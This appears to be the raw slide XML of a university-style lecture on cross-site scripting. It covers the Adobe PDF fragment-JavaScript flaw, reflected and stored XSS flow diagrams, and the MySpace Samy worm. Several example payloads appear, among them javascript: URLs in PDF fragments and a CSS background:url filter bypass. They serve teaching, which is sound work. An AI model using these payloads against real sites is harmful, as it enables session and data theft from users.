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04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460" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="-244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3CD7AF-71AA-43F8-9F2D-A5A8AAF41561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74668-F67F-4105-9562-513E3D17A8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30998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5FE0D-6765-4D80-8DBE-004483E3433E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paypal.com/cgi-bin/webscr?cmd=_hom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Module 6.3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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XSS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90600" y="2209800"/>
            <a:ext cx="7543800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en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194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Adobe PDF viewer “feature”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460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PDF documents execute JavaScript code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>code_here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The code will be executed in the context of the domain where the PDF files is hosted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t> be used against PDF files hosted on the local filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705601" y="1047749"/>
            <a:ext cx="163397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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(version &lt;= 7.9)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19462" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457201" y="6215064"/>
            <a:ext cx="798282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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-in.html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3048000"/>
            <a:ext cx="76200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en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204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Here’s how the attack works:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484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648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker locates a PDF file hosted on website.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker creates a URL pointing to the PDF, with JavaScript Malware in the fragment portion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  http://website.com/path/to/file.pdf#s=javascript:alert(”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”);) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker entices a victim to click on the link </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If the victim has Adobe Acrobat Reader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 7.0.x or less, confirmed in Firefox and Internet Explorer, the JavaScript Malware executes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2" y="6248400"/>
            <a:ext cx="615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alert is just an example. Real attacks do something worse.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2362200"/>
            <a:ext cx="7543800" cy="14773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en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215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And if that doesn’t bother you...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508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PDF files on the local filesystem:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#blah=javascript:alert("XSS");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>JavaScript Malware now runs in local context with the ability to read local files ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:b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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24579" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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601914"/>
            <a:ext cx="1436688" cy="143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11" descr="CompaqAlphaServerES4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59475" y="4979989"/>
            <a:ext cx="1155700" cy="142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1" name="Picture 4" descr="DS15serverfron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4188" y="1905000"/>
            <a:ext cx="2436812" cy="846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5943601" y="1524000"/>
            <a:ext cx="14261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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r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5562600" y="4552949"/>
            <a:ext cx="14877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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24584" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="6873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</p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="3886200"/>
            <a:ext cx="12666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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24586" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="99060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4587" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049590" y="4085708"/>
            <a:ext cx="16541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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319340" y="4536559"/>
            <a:ext cx="26384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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714627" y="3705226"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24590" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324349"/>
            <a:ext cx="3352800" cy="1162051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 type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24591" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="687387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4592" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="3028295" y="2764908"/>
            <a:ext cx="19412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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24593" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514602" y="3048000"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24594" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028827" y="4006851"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4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914402" y="1447801"/>
            <a:ext cx="2992437" cy="3779283"/>
            <a:chOff x="914400" y="1447615"/>
            <a:chExt cx="2992437" cy="3779466"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1371600" y="1447615"/>
              <a:ext cx="2535237" cy="3693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solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Send bad stuff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14400" y="4857731"/>
              <a:ext cx="2535238" cy="3693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solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Reflect it back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>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25603" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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601914"/>
            <a:ext cx="1436688" cy="143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Picture 11" descr="CompaqAlphaServerES4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59475" y="4979989"/>
            <a:ext cx="1155700" cy="142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5" name="Picture 4" descr="DS15serverfron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4188" y="1905000"/>
            <a:ext cx="2436812" cy="846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5943601" y="1524000"/>
            <a:ext cx="14261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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25607" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="4552949"/>
            <a:ext cx="14877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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25608" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5576888" y="3652838"/>
            <a:ext cx="1801813" cy="15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5609" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="3886200"/>
            <a:ext cx="12666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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25610" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3276601"/>
            <a:ext cx="17208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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25611" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="99060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5612" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3036890" y="4082534"/>
            <a:ext cx="21415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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25613" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2311402" y="4584184"/>
            <a:ext cx="29321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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25614" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750052" y="2865439"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25615" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1039646">
            <a:off x="2713040" y="3703639"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25616" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2084390" y="4086226"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25617" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324349"/>
            <a:ext cx="3352800" cy="1162051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 type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25618" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2205039"/>
            <a:ext cx="3211512" cy="687387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5619" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2943532" y="2075934"/>
            <a:ext cx="19329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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25620" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="2438402" y="2359026"/>
            <a:ext cx="365125" cy="365125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 smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4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2514600" y="3886201"/>
            <a:ext cx="6726238" cy="1559957"/>
            <a:chOff x="1752600" y="3457525"/>
            <a:chExt cx="6726237" cy="1560006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5943599" y="3457525"/>
              <a:ext cx="2535238" cy="3693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solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Store bad stuff</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1752600" y="4648187"/>
              <a:ext cx="2535238" cy="3693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solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Download it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MySpace.com   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>(Samy worm)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468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686800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Users can post HTML on their pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>MySpace.com ensures HTML contains no</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;, &lt;body&gt;, onclick, &lt;a href=javascript://&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>…  but can do Javascript within CSS tags:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;div style=“background:url(‘javascript:alert(1)’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>And can hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
